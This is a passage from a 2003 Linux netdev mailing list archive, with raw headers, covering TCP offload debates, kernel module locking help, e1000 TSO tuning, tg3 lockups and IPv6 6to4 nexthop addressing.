2003 21:03:05 -0400 Subject: Re: TCP IP Offloading Interface From: jamal Reply-To: hadi@cyberus.ca To: "David S. Miller" Cc: Jordi Ros , linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com, alan@storlinksemi.com In-Reply-To: <20030714225133.18395b69.davem@redhat.com> References: <20030714225133.18395b69.davem@redhat.com> Content-Type: text/plain Organization: jamalopolis Message-Id: <1058329895.1796.28.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 16 Jul 2003 01:02:33 -0400 Content-Transfer-Encoding: 7bit X-archive-position: 4080 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Tue, 2003-07-15 at 01:51, David S. Miller wrote: > > Note that Microsoft is considering TOE under its Scalable Networking > > Program. To keep linux competitive, I would encourage a healthy > > discussion on this matter > > I actually welcome Microsoft falling into this rathole of a > technology. Let them have to support that crap and have to field bug > reports on it, having to wonder who created the packets. And let them > deal with the negative effects TOE has on connection rates and things > like that. > > Linux will be competitive, especially if people develop the scheme I > have described several times into the hardware. There are vendors > doing this, will you choose to be different and ignore this? A friend of mine mentioned that the MS support may all be a big scam. It makes it easy to kill TOE if they get involved ;-> Yes, there will be some MIS managers who will buy the M$ B$. What about infiniband which has all this built in offloading? What happened to VIA? cheers, jamal From nalkunda@egr.msu.edu Tue Jul 15 18:35:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:36:07 -0700 (PDT) Received: from sys11.mail.msu.edu (sys11.mail.msu.edu [35.9.75.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G1ZsFl027496 for ; Tue, 15 Jul 2003 18:35:54 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys11.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19cbCu-000DY1-00; Tue, 15 Jul 2003 21:35:48 -0400 Content-Type: text/plain; charset="iso-8859-1" From: N N Ashok Organization: CSE, Michigan State University To: Krishna Kumar Subject: Re: Kernel locking up in module Date: Tue, 15 Jul 2003 21:28:34 -0400 User-Agent: KMail/1.4.3 Cc: netdev@oss.sgi.com, Stephen Hemminger References: <200307142031.15122.nalkunda@egr.msu.edu> In-Reply-To: <200307142031.15122.nalkunda@egr.msu.edu> MIME-Version: 1.0 Message-Id: <200307152128.34341.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6G1ZsFl027496 X-archive-position: 4081 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev On Monday 14 July 2003 20:31, N N Ashok scrawled: > On Monday 14 July 2003 20:28, Krishna Kumar scrawled: > > > > but the variable is non-null every other time I insert the module. > > > > Are you adding any new devices after the init() routine executes ? You > > seem to have exited the for loop due to bwusage becoming NULL, not the > > dev (while both should be null). > > Hi, > I am not modifying the dev list in anyway. I am just accessing the > list to get the stats for each device (get_stats()). And exactly as you > said, the bwusage becomes NULL before dev,although there is a one-to-one > correspondence between the list of dev and bwusage. > > > > You are not locking out the bottom half receive thread so it will > > > > deadlock > > > > Stephen, I don't understand how this is a deadlock ? His handler runs > > only in the bottom half and he has no other code which runs in regular or > > hard interrupt context. But you might want to try doing the mod_timer > > after dropping > > the lock to avoid a race (though not very likely ?). Unless it is > > re-entrant, > > which seems unlikely since he is using a 1 second timeout. > > I did have mod_timer() after unlocking but then I thought maybe > modifying the timer without locking it might cause some problem. So I put > it within the locked code. > > > BTW, you are assigning 'data' in your routine, which is OK, > > unsigned long *data = (unsigned long *) ptr; > > but if you reference it, that will crash the system since it is referring > > to a local stack variable of another routine. > > I had been using data in my routine earlier, I used it instead of the > 'count' variable to limit the number of times the routine was executed. But > again, thinking that might be the problem, I used a static variable in the > routine. > > After getting the replies, I tried to use spin_lock_bh() as well as > write_lock_bh() to lock/unlock, but the routine still exists with the > bwusage being NULL. Infact, it exits with bwusage being NULL every > alternate time I insert the module. Might or might not be just a > coincidence. > > Thanks again, > Ashok > > > - KK > > > > On Monday 14 July 2003 18:49, Stephen Hemminger scrawled: > > > On Mon, 14 Jul 2003 17:46:30 -0400 > > > > > > N N Ashok wrote: > > > > Hi All, > > > > I am creating a module to measure the outgoing bandwidth usage on > > > > the > > > > > > interfaces. It uses the get_stats() of the device to get the current > > > > stats and then computes the bandwidth usage. The algorithm for the > > > > usage > > > > > > calculation are borrowed from iproute2 package (tc/tc_estimator.c). > > > > The problem is that the kernel keeps locking up. I am using rwlock_t > > > > locks > > > > to > > > > > > lock the data. In the code, I traverse the list of bwuage structures > > > > and > > > > > > as a debug message am printing whether the traversal ended in the > > > > variable becoming null (which it should if everything went right), > > > > but the variable is non-null every other time I insert the module. > > > > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? > > > > "non-null" : "null", bwusage ? "non-null" : "null"); > > > > > > > > I think this has got to do with some locking issues. As this is my > > > > first go at the kernel locking, I might have used the wrong kind of > > > > locks. I have attached the module source, header and the log messages > > > > as > > > > > > I inserted the module a couple of times. I request you all to please > > > > help > > > > > > me as I am totally lost here. > > > > > > > > Thanks, > > > > Ashok > > > > > > You are not locking out the bottom half receive thread so it will > > > > deadlock > > > > > when it runs while your code holds the top half lock. From what I read in "Understanding the Linux Kernel", the timer routine that I setup is executed from the bottom half. Also in the book it says that data structures accessed in deferrable functions (which a bottom handler is I think), there is no need of any kind of locking/protection required for uniprocessor machines. Also it says that if we try to acquire a spin_lock on a uniprocessor in the kernel, then the kernel control path that does have the lock will not get a chance to release the lock and hence we will have a deadlock. In this context, I am unable to understand whether I should use locking and if so which kind. Do I need to disable the IRQs (_irq) when I take the lock? Or do I disable the bottom halves (_bh) ? Please help me in understanding and resolving the problem as it is required for my thesis. Thanks and Regards, Ashok From davem@redhat.com Tue Jul 15 18:49:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:50:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G1noFl028106 for ; Tue, 15 Jul 2003 18:49:51 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id SAA15437; Tue, 15 Jul 2003 18:39:11 -0700 Date: Tue, 15 Jul 2003 18:39:11 -0700 From: "David S. Miller" To: davidm@hpl.hp.com Cc: davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-Id: <20030715183911.1c18cc15.davem@redhat.com> In-Reply-To: <16148.34787.633496.949441@napali.hpl.hp.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> <16148.34787.633496.949441@napali.hpl.hp.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4082 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 16:01:55 -0700 David Mosberger wrote: > >>>>> On Mon, 14 Jul 2003 22:38:22 -0700, "David S. Miller" said: > > DaveM> But I don't think that's what is happening here, rather the > DaveM> PCI controller is "talking" to the CPU's L2 cache with > DaveM> coherency transactions on all the data of every packet going > DaveM> to the chip. > > That's true. But shouldn't it be true for both the TSO and non-TSO > case? The transfers are each longer in the TSO case, so need more to transfer more data from the bus just to get _one_ of the sub-packets of the large TSO frame out. It thus makes it more likely they'll be a delay. > DaveM> I know how this can be fixed, can you use L2-bypassing stores > DaveM> in your csum_and_copy_from_user() and copy_from_user() > DaveM> implementations like we do on sparc64? That would exactly > DaveM> eliminate this situation where the card is talking to the > DaveM> cpu's L2 cache for all the data during the PCI DMA transation > DaveM> on the send side. > > We could, but would it always be a win? Especially for > copy_from_user(). Most of the time, that data remains cached, so I > don't think we'd want to use non-temporal stores on those (in > general). csum_and_copy_from_user() isn't well optimized yet. Let's > see if I can find a volunteer... ;-) No, I mean "bypass L2 cache on miss" for stores. Don't tell me IA64 doesn't have that? 8) I certainly didn't mean "always bypass L2 cache" for stores :-) From hadi@cyberus.ca Tue Jul 15 19:19:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:19:55 -0700 (PDT) Received: from mail.cyberus.ca (mail.cyberus.ca [209.195.118.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2JjFl029147 for ; Tue, 15 Jul 2003 19:19:45 -0700 Received: from cpe0030ab124d2f-cm014500000962.cpe.net.cable.rogers.com ([24.103.99.32] helo=[10.0.0.9]) by mail.cyberus.ca with esmtp (Exim 4.12) id 19cbtQ-000JqD-00; Tue, 15 Jul 2003 22:19:44 -0400 Subject: Re: route-cache status? From: jamal Reply-To: hadi@cyberus.ca To: alex@pilosoft.com Cc: netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Organization: jamalopolis Message-Id: <1058336353.1899.41.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 16 Jul 2003 02:19:13 -0400 Content-Transfer-Encoding: 7bit X-archive-position: 4083 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Not sure if anybody responded to you; if you are on 2.4.x those patches seem to have made it into the latest pre 2.4.22 off kernel.org. Just grab those. cheers, jamal On Mon, 2003-07-07 at 13:03, alex@pilosoft.com wrote: > Hello, > > i've been following discussions a few weeks ago regarding developments of > route cache, and am trying to develop conclusion of the current best code > base. > > >From list, it seems that 2.4.20 is still better than 2.5.70+davem patches > or 2.4.21. > > Am I correct? Are there any newer patches available? > > -alex > > > > From davem@redhat.com Tue Jul 15 19:26:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:26:43 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2QaFl029607 for ; Tue, 15 Jul 2003 19:26:37 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA15519; Tue, 15 Jul 2003 19:17:09 -0700 Date: Tue, 15 Jul 2003 19:17:09 -0700 From: "David S. Miller" To: Julian Anastasov Cc: netdev@oss.sgi.com Subject: Re: [patches] invalid nh.raw use after free Message-Id: <20030715191709.1e0c6427.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4084 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 02:41:00 +0300 (EEST) Julian Anastasov wrote: > The attached patches fix similar bug to many places (I'm not > sure if there are more instances), where pointers remain to refer to > freed skbs. For 2.5 and 2.4. Good catch, I'll apply this. Thanks. From mmporter@cox.net Tue Jul 15 19:38:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:38:17 -0700 (PDT) Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2c5Fl030201 for ; Tue, 15 Jul 2003 19:38:06 -0700 Received: from liberty.homelinux.org ([68.2.43.114]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20030716023758.WVLP7643.fed1mtao01.cox.net@liberty.homelinux.org>; Tue, 15 Jul 2003 22:37:58 -0400 Received: (from mmporter@localhost) by liberty.homelinux.org (8.9.3/8.9.3/Debian 8.9.3-21) id TAA10307; Tue, 15 Jul 2003 19:37:58 -0700 Date: Tue, 15 Jul 2003 19:37:58 -0700 From: Matt Porter To: "David S. Miller" Cc: Alan Shih , linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030715193758.C8616@home.com> References: <20030713004818.4f1895be.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20030713004818.4f1895be.davem@redhat.com>; from davem@redhat.com on Sun, Jul 13, 2003 at 12:48:18AM -0700 X-archive-position: 4085 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mporter@kernel.crashing.org Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 12:48:18AM -0700, David S. Miller wrote: > On receive side, clever RX buffer flipping tricks are the way > to go and require no protocol changes and nothing gross like > TOE or weird buffer ownership protocols like RDMA requires. > > I've made postings showing how such a scheme can work using a limited > flow cache on the networking card. I don't have a reference handy, > but I suppose someone else does. The following reference should be useful for those following along at home and wondering what the hell this hardware flow cache scheme is: http://www.ussg.iu.edu/hypermail/linux/kernel/0306.2/0429.html Regards, -- Matt Porter mporter@kernel.crashing.org From mmporter@cox.net Tue Jul 15 19:46:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:47:00 -0700 (PDT) Received: from fed1mtao02.cox.net (fed1mtao02.cox.net [68.6.19.243]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2ktFl031077 for ; Tue, 15 Jul 2003 19:46:55 -0700 Received: from liberty.homelinux.org ([68.2.43.114]) by fed1mtao02.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20030716024649.XOUR24536.fed1mtao02.cox.net@liberty.homelinux.org>; Tue, 15 Jul 2003 22:46:49 -0400 Received: (from mmporter@localhost) by liberty.homelinux.org (8.9.3/8.9.3/Debian 8.9.3-21) id TAA10355; Tue, 15 Jul 2003 19:46:49 -0700 Date: Tue, 15 Jul 2003 19:46:49 -0700 From: Matt Porter To: "David S. Miller" Cc: Valdis.Kletnieks@vt.edu, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030715194649.D8616@home.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu> <20030713174242.3ceb8213.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20030713174242.3ceb8213.davem@redhat.com>; from davem@redhat.com on Sun, Jul 13, 2003 at 05:42:42PM -0700 X-archive-position: 4086 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mporter@kernel.crashing.org Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 05:42:42PM -0700, David S. Miller wrote: > There are cards, both existing and in development, that have > very simple header parsing engines you can program to do stuff > like this, it isn't hard at all. Do you have a reference to an existing card that implements a header parsing engine like this (and has obtainable docs)? Regards, -- Matt Porter mporter@kernel.crashing.org From pakrat@www.linux.org.uk Tue Jul 15 20:52:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 20:52:58 -0700 (PDT) Received: from www.linux.org.uk (IDENT:rwCGhAyYAIdsaD//UFnmshH1hGqE76nc@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G3qmFl032195 for ; Tue, 15 Jul 2003 20:52:49 -0700 Received: from pakrat by www.linux.org.uk with local (Exim 4.14) id 19cVbT-0005j2-An; Tue, 15 Jul 2003 20:36:47 +0100 Date: Tue, 15 Jul 2003 20:36:47 +0100 From: Chris Dukes To: ralph+d@istop.com Cc: Jordi Ros , "netdev@oss.sgi.com" Subject: Re: TCP IP Offloading Interface Message-ID: <20030715193647.GQ2686@parcelfarce.linux.theplanet.co.uk> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-archive-position: 4087 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pakrat@www.uk.linux.org Precedence: bulk X-list: netdev On Tue, Jul 15, 2003 at 03:01:11PM -0400, Ralph Doncaster wrote: > On Mon, 14 Jul 2003, Jordi Ros wrote: > > > Note that Microsoft is considering TOE under its Scalable Networking Program. To keep linux competitive, I would encourage a healthy discussion on this matter. Again, TOE is not the goal but the means to deliver important technologies for the next generation of servers. This will be critical as the backbone of the Internet goes to all optical networks while the servers stay at the electronic domain. As shown by McKeown, "Circuit Switching in the Core", the line capacity of the optical fibers is doubling every 7 months while the processing CPU capacity (Moore's law) can only double every 18 months. > > Moore's law is borne out in practice; most optical tansmission > developments are theory. 3 years ago the fastest circuit you could > readily buy from a carrier (QWest, 360, Williams, etc) was OC192. Today I > still can't contact a rep from any of those companies and order an OC768. The above ignores the economics of the matter. The money in optical carriers is currently in datacomm, not telecomm. You'll see the highspeed optics in your server room before you see it at your telco. Companies that work with datacomm optical carriers are facing budget limits with respect to software required for in house development of hybrid ICs for highspeed datacom and compute resources for simulating the highspeed analogue circuits required for optical datacom. The theoretical switching speed is useless when the engineers are back to designing digital circuits transistor by transistor and cannot verify that all the circuits synchronize at those speeds. -- Chris Dukes I tried being reasonable once--I didn't like it. From davem@redhat.com Tue Jul 15 21:52:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 21:53:07 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G4qvFl000780 for ; Tue, 15 Jul 2003 21:52:58 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA15768; Tue, 15 Jul 2003 21:43:33 -0700 Date: Tue, 15 Jul 2003 21:43:32 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] dynamic net_device for serial eql balancer Message-Id: <20030715214332.4a33db6d.davem@redhat.com> In-Reply-To: <20030715155733.0ee5a14d.shemminger@osdl.org> References: <20030715155733.0ee5a14d.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4088 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 15:57:33 -0700 Stephen Hemminger wrote: > Patch against 2.6.0-test1 to dynamically allocate pseudo network device. > Compiles and loaded/unloaded but don't have multi-port serial load balancing to test > more fuly. Applied, thanks Stephen. From davem@redhat.com Tue Jul 15 22:02:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 22:02:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G52dFl001234 for ; Tue, 15 Jul 2003 22:02:39 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA15798; Tue, 15 Jul 2003 21:53:00 -0700 Date: Tue, 15 Jul 2003 21:53:00 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM] some misc sk-related fixups for atm Message-Id: <20030715215300.1927dbac.davem@redhat.com> In-Reply-To: <200307151254.h6FCshsG028747@ginger.cmf.nrl.navy.mil> References: <200307151254.h6FCshsG028747@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4089 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 08:52:15 -0400 chas williams wrote: > this set does away with a few redundant bits in the struct atm_vcc, > in particular .reply and .svc_callback. WAITING becomes a flag > instead of overloading sk_err. it also changes the wake_up's to > the appropriate sk event. Looks good, applied. Thanks Chas. From greearb@candelatech.com Tue Jul 15 22:07:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 22:07:54 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G57lFl001623 for ; Tue, 15 Jul 2003 22:07:48 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6G57eKk013055 for ; Tue, 15 Jul 2003 22:07:42 -0700 Message-ID: <3F14DD9C.9090807@candelatech.com> Date: Tue, 15 Jul 2003 22:07:40 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: tg3 and machine lockup? Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4090 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev I was running 2500 pps tx+rx on a 100bt port, with a tg3 in the same machine. 1000 tcp connections, memory pressure, and cpu was max'ed out. I plugged in the tg3 to a e1000 (via cross-over cable), and then, or very soon after that, the machine hung solid (or, maybe it tried to spew to console..was on kvm and not selected..) Last thing I see in the /var/log/messages is tg3 saying flow control is on for tx and rx. Now, it could be one of a million things...but just curious if anyone else has seen anything like this. Kernel is 2.4.20 + my hacks. Take it easy, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 15 22:17:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 22:17:49 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G5HYFl002094 for ; Tue, 15 Jul 2003 22:17:39 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA15850; Tue, 15 Jul 2003 22:08:10 -0700 Date: Tue, 15 Jul 2003 22:08:10 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: tg3 and machine lockup? Message-Id: <20030715220810.24bf073f.davem@redhat.com> In-Reply-To: <3F14DD9C.9090807@candelatech.com> References: <3F14DD9C.9090807@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4091 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 22:07:40 -0700 Ben Greear wrote: > Now, it could be one of a million things...but just curious if anyone > else has seen anything like this. Kernel is 2.4.20 + my hacks. There were tons of locking fixes to the tg3 driver in 2.4.21 From pekkas@netcore.fi Tue Jul 15 23:04:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:04:23 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G64CFl004279 for ; Tue, 15 Jul 2003 23:04:16 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6G63vh20151; Wed, 16 Jul 2003 09:03:57 +0300 Date: Wed, 16 Jul 2003 09:03:57 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307152319.DAA09683@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4092 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Assume you're a host on a link with prefix 3FFE:FFFF:A:B::/64. The router > > is the one with interface ID one. > > Not going to work. Host autoconfiguration conventions have nothing > to do with real addressing. Proceeding in this way you will denounce > neighbour discovery, what the hell to do this when hw address can be recovered > from EUI64 token? :-) Did you miss the word "Assume" ? > > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? > > Hey, you have lost track, rewind several mails ago. Nope. I'm just pointing out the general concept. > Of course, ping and > any other protocols will work, how can it not work? :-) It has been made shown to work on other platforms, so why not Linux? -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From pekkas@netcore.fi Tue Jul 15 23:12:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:12:29 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G6CIFl004854 for ; Tue, 15 Jul 2003 23:12:19 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6G6C5v20245; Wed, 16 Jul 2003 09:12:05 +0300 Date: Wed, 16 Jul 2003 09:12:04 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307152332.DAA09710@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4093 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Such addresses are link-locals, of link local scope only. A link-local > > IPv6 address is awfully difficult to remember and type for all of your > > possible links. > > > > The only reasonable value user could supply is a global address. > > So what? I do not see connection to previous. You want to live with global > addresses as nexthop? Yes, I dare to say that they're a requirement. (But to be clear, when I talk about "global nexthop", I'm only interested in nexthops which are on-link. That is, if you have prefix 3FFF:FFFF:A:B::/64, setting 3FFE:FFFF:A:B::1 would be ok, but 3FFE:FFFF:F00:BA::1 would not *have* to work.) > OK. But I remember you have spoken something quite > opposite yesterday. I don't recall that. I think I was only suggesting that ONE possible way of implementing it (which I wouldn't think is the best one) is make that the user space tools' problem: i.e. make them resolve a globally addressed nexthop to a link-local nexthop. > > Redundant information can be ignored. This is not computer science > > theory, removing everything which is not directly relevant. The use of > > the same representation for the next-hop (2002:F00:BA::x) as an address > > (2002:BA:F00:y) is the only logical, user-friendly way. > > What a bullshit... The second is address of host "x". The first is supposed > to be address of host F00:BA, whatever it is. Probably, you can decrypt > this only because poisoned by computer science. :-) You read too much to in what I wrote (or maybe I wrote too much :-) -- what I mean is that 6to4 addresses have a very specific format. It's completely illogical and unfriendly to the users to require use different formats when they use 6to4 addresses as nexthops and "normal" addresses. > Just to complete discussion, let's stay on format fe80::A.B.C.D, for example. > Unlike anothers it is 100% logically clean. :-) I can't disagree with you there; it's simple, but it's NOT what specifications use and the *users* want and need to use. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From davidm@napali.hpl.hp.com Tue Jul 15 23:32:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:32:56 -0700 (PDT) Received: from 